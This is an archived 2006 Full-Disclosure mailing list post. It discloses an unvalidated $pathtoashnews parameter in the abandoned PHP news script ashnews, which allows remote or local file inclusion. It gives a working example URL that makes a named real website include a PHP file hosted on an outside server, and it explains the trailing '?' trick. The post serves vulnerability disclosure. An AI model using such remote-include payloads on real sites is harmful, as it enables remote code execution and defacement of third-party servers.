lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list] 
Date: Tue Jan 31 10:43:31 2006
From: dan-fd at f-box.org (DanB-FD)
Subject: ashnews Cross-Site Scripting Vulnerability

Hi,

Dan B UK wrote:

> Due to the nature of the issue I am not disclosing the detail of it 
> until the writer of the software has updated it; maybe you could have 
> waited??
>
> A vulnerability that allows privileges of the apache user within the 
> limitations of how much PHP has been locked down.


Since the author of the product has got back to me with the following I 
think it is ok to disclose the issue now.

"That is a known error. Unfortunately I have completely abondoned 
ashnews. In fact, I have been neglecting taking it down completely which 
I am going to do right now. - Derek"

The issue is in the handling of the $pathtoashnews, it is not validated 
before being used by the script. Allowing remote or local file inclusion.

eg: 
http://dosko.nl/news/ashnews.php?pathtoashnews=http://f-box.org/~dan/inc.inc?
( The ? is required to make the remote server (f-box.org) ignore the 
string that is appended to the variable $pathtoashnews )
( The website that is in the example above has already been defaced! )

Cheers,
DanB UK.

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ